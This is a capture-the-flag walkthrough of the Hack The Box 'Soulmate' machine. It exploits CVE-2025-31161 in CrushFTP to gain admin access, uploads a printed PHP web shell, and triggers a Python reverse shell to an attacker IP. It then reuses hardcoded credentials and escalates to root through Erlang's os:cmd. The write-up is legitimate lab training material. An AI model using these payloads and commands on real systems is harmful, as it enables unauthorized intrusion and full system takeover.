https://app.hackthebox.

com/machines/Soulmate

IP

10.10.11.86

Domain/Hosts

soulmate.htb ftp.soulmate.htb

Nmap Results
Web Enumeration
Soulmate.htb
We open http://soulmate.htb/ in Browser

We see a Dating Site, we can register and Login as new User

We can register and Login as new User

Dating Profil
 Info

I examined the page but didn’t find anything useful that could help us exploit a vulnerability or gain
further access — at least not for now, but it might become relevant later.

We enumerate web directories on soulmate.htb with Feroxbuster

feroxbuster -u http://soulmate.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-

directories.txt -x php,html,js,json,txt,log -t 50 -e

Nothing Usefull

ftp.soulmate.htb
We fuzz subdomains on soulmate.htb with FFUF

ffuf -u http://10.129.xxx.175 -H "Host: FUZZ.soulmate.htb" -w

 /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 4

We found the Subdomain ftp.soulmate.htb

Lets open http://ftp.soulmate.htb in Browser

We are redirected to http://ftp.soulmate.htb/WebInterface/login.html

Its a Crush FTP Login Site

Lets Check the Source Code for Version Hints

 Info

CrushFTP Version

When inspecting the HTML source code of the CrushFTP login page, we notice that the URLs of the
JavaScript and CSS files contain an embedded version identifier:

<script type="module" crossorigin src="/WebInterface/new-ui/assets/app/components/loader2.js?

v=11.W.657-2025_03_08_07_52"></script>

The version string 11.W.657-2025_03_08_07_52 is repeated in several places, confirming that the running
CrushFTP version is 11.W.657, built on March 8, 2025.

CVE-2025-31161
We found different CVEs for that Version

Lets try CVE-2025-31161

We use https://github.com/Immersive-Labs-Sec/CVE-2025-31161

We clone CVE-2025-31161 exploit repo

git clone https://github.com/Immersive-Labs-Sec/CVE-2025-31161.git

We exploit CVE-2025-31161 to add user zero

python3 cve-2025-31161.py --target_host ftp.soulmate.htb --port 80 --target_user root --new_user zero

--password 1234

The user zero with Pw 1234 succesfull created

We login with our created User

We succesfull login as an User with admin rights

We go in the Admin Section/User Manager

http://ftp.soulmate.htb/WebInterface/UserManager/index.html

We see some Users we select one

We can change the PW

I change the PW of the user ben to 123456

Then click Save

We are User ben now

We go to http://ftp.soulmate.htb/#/webProd/

And use the Add files function

We upload a simplebackdoor.php
simplebackdoor.php

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

We open the shell in http://soulmate.htb/simplebackdoor.php

Start a listener

pwncat-cs --listen --port 4444

I use the python3 revshell

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.xx.1x4",4444));

[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

We trigger the revshell

http://soulmate.htb/simplebackdoor.php?cmd=python3%20-
c%20%27import%20os,pty,socket;s=socket.socket();s.connect((%2210.10.xx.1x4%22,4444));
[os.dup2(s.fileno(),f)for%20f%20in(0,1,2)];pty.spawn(%22sh%22)%27

Summary

Revshell

At first, we tried accessing the file at

http://ftp.soulmate.htb/#/webProd/simplebackdoor.php

but this only triggered a download of the file instead of executing it.
 The application stores uploaded files in a published web directory that can be accessed via the browser. In
the case of ftp.soulmate.htb , we used the upload function at

http://ftp.soulmate.htb/#/webProd/

However, the upload is not placed directly under /webProd/ . Instead, it is stored in the document root (e.g.,
/var/www/html/ or a similar location). From experience with similar applications (and sometimes due to
web app design flaws), we can assume that the files become accessible in the main web root.

Therefore, when we browsed to

http://soulmate.htb/simplebackdoor.php

the PHP code was executed, and we successfully gained a web shell.

First Foothold
We got a shell on the Mashine

We run linepas

./linpeas.sh

We see some open Ports

lets check the port 2222

nc 127.0.0.1 2222
SSH-2.0-Erlang/5.2.9 ✅

Erlang

While reviewing the LinPEAS output, we repeatedly came across references to Erlang components,
indicating that the environment makes extensive use of Erlang
We check the erlang_login Directory

cd /usr/local/lib/erlang_login

We list files with ls -al

ls -al

We read start.escript
 cat /usr/local/lib/erlang_login/start.escript

We found the creds

user= ben PW= HouseH0ldings998 ✅

User Flag
We access SSH as ben

ssh [email protected]

We read user.txt Flag 🏁

cat user.txt

Summary

Get User

While running LinPEAS, we noticed an unusual directory under /usr/local/lib/ :

/usr/local/lib/erlang_login/start.escript /usr/local/lib/erlang_login/login.escript
/usr/local/lib/erlang_login/login_wrapper

These files do not belong to a default Erlang installation and appear to have been manually added. The
directory name erlang_login suggests that this is a custom service, most likely handling some form of
authentication or login functionality.

To further investigate, we used Netcat against localhost on port 2222:

 nc 127.0.0.1 2222

We received the following banner in response:

SSH-2.0-Erlang/5.2.9

This confirms that a custom SSH-like service built on Erlang is running on port 2222. Since it is named
erlang_login , it is highly likely that the scripts contain hardcoded credentials or authentication logic.
Analyzing the content of start.escript or login.escript could therefore reveal valid login details and
serve as a potential path for exploitation.

Privesc
We check sudo privileges

sudo -l

No sudo rights for ben

Info

Since we previously observed with Netcat that an SSH service is running on port 2222 , we decided to
attempt logging in using the user ben .

We pivot via SSH on port 2222 as ben

PW= HouseH0ldings998

ssh ben@localhost -p 2222

We inside the erlang shell

I google code execution in erlang

Further down during our google search, we came across a helpful page that provided us with
additional information to continue the attack
We execute id command via Erlang shell

os:cmd("id").

The console runs with root rights ✅

We read root.txt via Erlang shell

os:cmd("cat /root/root.txt").

We got the root Flag

Summary

Privesc

While running LinPEAS, we discovered an unusual service under /usr/local/lib/erlang_login/ , which

contained several .escript files. The naming suggested that this was a custom login service built with
Erlang.

Testing with Netcat revealed that a service was listening on 127.0.0.1:2222 , responding with the banner
SSH-2.0-Erlang/5.2.9 . Based on this, we attempted to log in with the user ben.

We eventually gained access to an Erlang shell, where we could execute arbitrary system commands using
the os:cmd/1 function. We verified our root privileges with:

os:cmd("id").
 The commands for OS command execution in Erlang were found here:
https://vuln.be/post/os-command-and-code-execution-in-erlang-and-elixir/

After confirming that we had root privileges, we retrieved the root flag with:

os:cmd("cat /root/root.txt").

Write up created from